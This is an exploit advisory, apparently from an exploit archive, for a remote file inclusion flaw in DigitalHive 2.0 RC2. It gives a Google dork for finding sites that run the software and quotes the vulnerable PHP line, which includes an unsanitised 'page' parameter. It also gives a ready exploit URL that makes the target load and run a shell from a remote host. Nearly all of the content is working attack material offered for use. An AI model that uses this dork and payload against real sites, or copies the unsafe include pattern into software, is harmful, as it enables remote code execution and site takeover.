id: 1002
date: 10/14/2006
title: DigitalHive <= 2.0 RC2 (base_include.php) Remote Include Vulnerability
author: SHiKaA
cves: 

======================================================================
DigitalHive <= 2.0 RC2 (base_include.php) Remote Include Vulnerability
======================================================================




#==============================================================================================
#DigitalHive <= v2.0 RC2 (page) Remote File Inclusion Exploit
#===============================================================================================
#                                                                     
#Critical Level : Dangerous                                           
#                                                                     
#Version : v2.0 RC2                                                                                            
#================================================================================================
#
#DORK : "Powered by DigitalHive"
#
#================================================================================================
#Bug in : template/purpletech/base_include.php
#
#Vlu Code :
#--------------------------------
#
#        <?php include ($_GET["page"]); ?>
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/template/purpletech/base_include.php?page=http://SHELLURL?
#
#================================================================================================
#Discoverd By : SHiKaA
#Thx To : Str0ke & SuperRomio & XoRon & MDx & Simo
# sPECial THanks to : Coder-AZH@CKTEAM
==================================================================================================


#  0day.today [2023-03-22]  #